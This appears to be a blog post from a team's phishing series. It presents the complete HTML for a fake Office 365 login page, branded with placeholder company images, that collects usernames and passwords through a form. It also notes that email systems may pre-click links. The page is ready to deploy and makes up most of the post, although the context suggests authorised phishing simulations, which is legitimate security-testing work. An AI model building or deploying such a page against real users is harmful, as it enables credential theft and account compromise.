Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may “pre-click” malicious links before users ever actually do.

This phishing page has served us well:

<html><head><title>YourDomain.com - Office 365 Email Login</title>
<style>
body {
background-image: url("https://YOURDOMAIN.com/static/backgroundimage.png");
background-repeat:no-repeat;
background-size:cover;
}
</style>
</head><body><br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<center><img src="https://YOURDOMAIN.com/static/owa.png"/></center>
<center><img src="https://YOURDOMAIN.com/static/COMPANYLOGO.png"/></center>
<br/>
<br/>
<br/>
<br/>
<br/>
<center>
<table style="width:40%">
<tbody><tr>

<th><form action="" method="post" name="form">
<p style="color:black;"><label>User Name:</label> <input name="username" type="text"/>
</p><p style="color:black;"><label>Password:</label> <input name="password" type="password"/>
<br/>
<br/>
<input type="image" id="image" value="Login" src="https://YOURDOMAIN.com/static/signin.png">
</p></form>
</th>
</tr>
</tbody></table>

<br/>
<br/>
<center>
<p style="color:black;">
</p><p><b>Please login to complete your Office 365 setup.</b>
</p>
</center>

</center></body></html>